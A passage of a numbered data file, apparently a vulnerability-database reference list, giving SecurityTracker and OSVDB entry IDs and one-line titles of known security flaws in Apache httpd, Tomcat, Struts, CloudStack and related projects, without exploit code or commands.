7488| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
7489| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
7490| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
7491| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
7492| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
7493| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
7494| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
7495| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
7496| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
7497| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
7498| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
7499| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
7500| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
7501| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
7502| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
7503| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
7504| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
7505| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
7506| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
7507| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
7508| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
7509| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
7510| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
7511| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
7512| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
7513| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
7514| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
7515| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
7516| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
7517| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
7518| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
7519| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
7520| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
7521| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
7522| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
7523| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
7524| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
7525| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
7526| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
7527| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
7528| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
7529| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
7530| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
7531| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
7532| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
7533| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
7534| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
7535| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
7536| [1008920] Apache mod_digest May Validate Replayed Client Responses
7537| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
7538| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
7539| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
7540| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
7541| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
7542| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
7543| [1008030] Apache mod_rewrite Contains a Buffer Overflow
7544| [1008029] Apache mod_alias Contains a Buffer Overflow
7545| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
7546| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
7547| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
7548| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
7549| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
7550| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
7551| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
7552| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
7553| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
7554| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
7555| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
7556| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
7557| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
7558| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
7559| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
7560| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
7561| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
7562| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
7563| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
7564| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
7565| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
7566| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
7567| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
7568| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
7569| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
7570| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
7571| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
7572| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
7573| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
7574| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
7575| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
7576| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
7577| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
7578| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
7579| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
7580| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
7581| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
7582| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
7583| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7584| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7585| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
7586| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
7587| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
7588| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
7589| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
7590| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
7591| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
7592| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
7593| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
7594| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
7595| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
7596| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
7597| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
7598| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
7599| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
7600| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
7601|
7602| OSVDB - http://www.osvdb.org:
7603| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
7604| [96077] Apache CloudStack Global Settings Multiple Field XSS
7605| [96076] Apache CloudStack Instances Menu Display Name Field XSS
7606| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
7607| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
7608| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
7609| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
7610| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
7611| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
7612| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
7613| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
7614| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
7615| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
7616| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
7617| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
7618| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
7619| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
7620| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
7621| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
7622| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
7623| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
7624| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
7625| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
7626| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
7627| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
7628| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
7629| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
7630| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
7631| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
7632| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
7633| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
7634| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
7635| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
7636| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
7637| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
7638| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
7639| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
7640| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
7641| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
7642| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
7643| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
7644| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
7645| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
7646| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
7647| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
7648| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
7649| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
7650| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
7651| [94279] Apache Qpid CA Certificate Validation Bypass
7652| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
7653| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
7654| [94042] Apache Axis JAX-WS Java Unspecified Exposure
7655| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
7656| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
7657| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
7658| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
7659| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
7660| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
7661| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
7662| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
7663| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
7664| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
7665| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
7666| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
7667| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
7668| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
7669| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
7670| [93541] Apache Solr json.wrf Callback XSS
7671| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
7672| [93521] Apache jUDDI Security API Token Session Persistence Weakness
7673| [93520] Apache CloudStack Default SSL Key Weakness
7674| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
7675| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
7676| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
7677| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
7678| [93515] Apache HBase table.jsp name Parameter XSS
7679| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
7680| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
7681| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
7682| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
7683| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
7684| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
7685| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
7686| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
7687| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
7688| [93252] Apache Tomcat FORM Authenticator Session Fixation
7689| [93172] Apache Camel camel/endpoints/ Endpoint XSS
7690| [93171] Apache Sling HtmlResponse Error Message XSS
7691| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
7692| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
7693| [93168] Apache Click ErrorReport.java id Parameter XSS
7694| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
7695| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
7696| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
7697| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
7698| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
7699| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
7700| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
7701| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
7702| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
7703| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
7704| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
7705| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
7706| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
7707| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
7708| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
7709| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
7710| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
7711| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
7712| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
7713| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
7714| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
7715| [93144] Apache Solr Admin Command Execution CSRF
7716| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
7717| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
7718| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
7719| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
7720| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
7721| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
7722| [92748] Apache CloudStack VM Console Access Restriction Bypass
7723| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
7724| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
7725| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
7726| [92706] Apache ActiveMQ Debug Log Rendering XSS
7727| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
7728| [92270] Apache Tomcat Unspecified CSRF
7729| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
7730| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
7731| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
7732| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
7733| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
7734| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
7735| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
7736| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
7737| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
7738| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
7739| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
7740| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
7741| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
7742| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
7743| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
7744| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
7745| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
7746| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
7747| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
7748| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
7749| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
7750| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
7751| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
7752| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
7753| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
7754| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
7755| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
7756| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
7757| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
7758| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
7759| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
7760| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
7761| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
7762| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
7763| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
7764| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
7765| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
7766| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
7767| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
7768| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
7769| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
7770| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
7771| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
7772| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
7773| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
7774| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
7775| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
7776| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
7777| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
7778| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
7779| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
7780| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
7781| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
7782| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
7783| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
7784| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
7785| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
7786| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
7787| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
7788| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
7789| [86901] Apache Tomcat Error Message Path Disclosure
7790| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
7791| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
7792| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
7793| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
7794| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
7795| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
7796| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
7797| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
7798| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
7799| [85430] Apache mod_pagespeed Module Unspecified XSS
7800| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
7801| [85249] Apache Wicket Unspecified XSS
7802| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
7803| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
7804| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
7805| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
7806| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
7807| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
7808| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
7809| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
7810| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
7811| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
7812| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
7813| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
7814| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
7815| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
7816| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
7817| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
7818| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
7819| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
7820| [83339] Apache Roller Blogger Roll Unspecified XSS
7821| [83270] Apache Roller Unspecified Admin Action CSRF
7822| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
7823| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
7824| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
7825| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
7826| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
